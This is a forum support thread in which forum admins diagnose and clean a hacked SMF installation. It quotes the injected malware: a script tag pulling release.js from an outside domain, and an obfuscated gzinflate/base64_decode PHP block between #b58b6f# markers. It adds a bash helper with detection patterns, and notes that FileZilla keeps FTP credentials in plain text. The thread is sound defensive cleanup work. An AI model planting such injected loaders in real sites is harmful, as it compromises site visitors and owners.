Preview broken, possible hack?

Started by Venera, March 11, 2012, 02:29:49 PM


Venera

Hello there.

I noticed problems with the "preview" button on my 2.0.2 forum today. I started to search for problems when I saw this code at the end of my source:
</body></html><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script>

As that code comes after the html tags I guess it is causing the preview of posts not to show, so I tried to find that code in my files. I searched all my files for "organicfood" and only found it in one file (not related to SMF):
\www\stats\webalizer\index.html (1 hits)
Line 22: <BODY BGCOLOR="#E8E8E8" TEXT="#000000" LINK="#0000FF" VLINK="#FF0000"><!--b58b6f--><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script><!--/b58b6f-->


I tried removing that code from the index.html file, but when I look at the page source I can still see it at the end of the page!

I also must note that I did not add that code myself, and I'm the only administrator at my forum (no one else has ftp/login details). I searched for the organicfood code, and I saw that many people reported that their sites were hacked with that code added. I don't have anything else on my server besides SMF.
Nothing in error log.

Forum url: venerinsan.com

Any suggestions please: is my forum/server hacked, and how can I remove that code and fix the preview problem?

Regards.

kat

Have a look at the files on your site. Do any of them have recent datestamps?

If so, have a look at them, especially for "eval base64_decode" stuff, which'll usually be on the first line, or thereabouts.

In a word or three, yes, I think you've been hacked. :(

Got a valid backup of the software on your site? (He asks, expecting the answer "No").

Venera

Hey.

Yes, I do have a working backup, but I wanted to see if I can just remove the code and fix my forum that way, without losing data posted in the meantime.

Do you think I should search for base64_decode text in the SMF files now?
I don't know about datestamps, can you help me with that?

Regards.

Aleksi "Lex" Kilpinen

If you have an ftp client like FileZilla, you'll be able to see the files' last modification times. If there are edits done to files recently, you should check those files for anything out of place: iframes, javascripts, eval code etc.
You should also be on the lookout for any files on your account that are not part of SMF, and you think shouldn't be there.

If you find any traces of an actual hacking, you might also want to contact your host - it's not uncommon for hackers to compromise several accounts at the same time, if they can gain access to one first. So it might be the server was hacked, not just you.
Slava Ukraini!
"Before you allow people access to your forum, especially in an administrative position, you must be aware that that person can seriously damage your forum. Therefore, you should only allow people that you trust, implicitly, to have such access." -Douglas

How you can help SMF

Dzonny

Okay, I just had the same report for one of my forums.
The same script was in the source, so I searched through all my files and found nothing. Then I opened index.php and at the end I found this:

#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#

That is the code that should be removed from every index.php file inside your forum's directory. I just fixed all that, and the code disappeared from the page source.

I don't know how this happened, but I just wanted to post the solution here so that if more members have a similar problem they can fix it easily. (Although it's not so "easy", as there are plenty of index.php files inside the forum dir.)

This problem is fixed, so I'm marking this topic as solved. (I fixed it for Venera.)
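The checks kat and Lex describe above (recent modification times, searching for eval/base64_decode) and Dzonny's removal of the #b58b6f# block from the index.php files, collected into one set of shell helpers. This is an added example, not code from this thread, from SMF or from any of the posters; the web root path and the day count are assumed arguments, and the only indicators it knows are the ones quoted in this thread.

```bash
#!/usr/bin/env bash
# Added example, not code from this thread or from SMF. Triage helpers for a
# compromised web root: list recently modified files, flag obfuscated PHP
# loaders, and strip the marker-delimited block quoted above from index.php
# files, keeping a .bak copy of every file touched. The web root path and the
# day count are assumed arguments; run it against a copy of the site first.

set -u

# Files under $1 whose modification time is within the last $2 days (default 7).
# A forum that has not been upgraded or edited recently should show very little.
recent_files() {
  local root="$1" days="${2:-7}"
  find "$root" -type f -mtime "-$days" -print
}

# "file:line:text" for lines that look like obfuscated loaders or carry the
# b58b6f marker. eval/base64_decode/gzinflate do have legitimate uses, so a hit
# is a lead to read, not proof on its own.
suspicious_lines() {
  local root="$1"
  grep -rnE --include='*.php' --include='*.html' \
    'eval[[:space:]]*\(|gzinflate[[:space:]]*\(|base64_decode[[:space:]]*\(|b58b6f' \
    "$root" 2>/dev/null
}

# Number of .php/.html files under $1 that still contain the marker
# (the .bak copies written by strip_marker_block are deliberately not counted).
count_marked_files() {
  grep -rlF --include='*.php' --include='*.html' 'b58b6f' "$1" 2>/dev/null \
    | wc -l | tr -d ' '
}

# Delete everything from a line starting with #b58b6f# through the line
# starting with #/b58b6f#, inclusive, in one PHP file. The original is saved as
# <file>.bak before the rewrite. Only the PHP form of the marker is handled; the
# HTML form (<!--b58b6f-->) sits inline on a <BODY> line and needs manual editing.
strip_marker_block() {
  local file="$1" tmp
  tmp="$(mktemp)" || return 1
  cp -p "$file" "$file.bak" || return 1
  awk '/^#b58b6f#/ {skip=1} !skip {print} /^#\/b58b6f#/ {skip=0}' "$file" > "$tmp" \
    && mv "$tmp" "$file"
}
```

Typical use, with the web root as an assumed example path: source the file, run `recent_files /path/to/forum 7` and `suspicious_lines /path/to/forum` and read every hit, then `strip_marker_block` each index.php that `grep -rlF '#b58b6f#'` reports, and finally check that `count_marked_files` returns 0. The scan only finds what it is told to look for; as kat and Lex say, the reliable step is comparing against a known-good backup and changing every credential afterwards.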

rickheck

Just a warning. If you are using FileZilla as your FTP client, there is malware out there that will grab your FTP credentials from the FileZilla PLAIN TEXT FILE (yikes!  >:( ) and use that information to insert that malware code (indicated by the #b58b6f# type of code around a "gzinflate(base64_decode)" command). That is how your files will get attacked/compromised.

Look in your %APPDATA%/Roaming/FileZilla folder. One of the XML files in there has all your FTP web site credentials (user/password/etc) in PLAIN TEXT!  And the FileZilla people refuse to fix that obvious security hole.

My recommendation: delete FileZilla from your computer (and you have to manually delete the folder in your APPDATA folder).

If you need a secure FTP client, use WinSCP (www.winscp.net), where you can set a master password and all of your site credentials are encrypted.

Just a warning....Rick...

MrPhil

All FTP clients transfer passwords in clear text (that's the protocol), but it's inexcusable that FZ would store it in the open! I wonder how other clients store passwords? I know that FTP Commander encrypts it in some format. I suppose that once you know the algorithm used, and can figure out where the key comes from, that any list would be easily cracked, but at least there would be some work involved.

This is a second strike against FZ. There's a big debate going on in the Bugs board about the fact that SMF stores attachments and avatars with hashed names with no extension (filetype). If you use FZ to do a backup, with automatic mode selection, it will choose ASCII for these files and will thus corrupt any binary files in your backup! The SMF developers say, "That's not our fault; it's an FZ bug so we don't need to do anything about it," and the FZ developers have been saying for years that, "All the extension-less files we ever transfer are text, so ASCII is appropriate." The bottom line is don't use Filezilla to back up your site!

Aleksi "Lex" Kilpinen

FileZilla is fine, it's a good client - you just need to make sure you know the oddities of it. A wise user learns the settings, and tests the results, before trusting any software.

Just like actually keeping a plain text file of all your passwords ever should be safe for you to have on your computer, you just need to make sure your computer is clean and protected. A wise user does not keep them saved in the client forever, but deletes them when they are not needed.

Bottom line, Filezilla can be safely used, when you know what you do, and use some common sense.
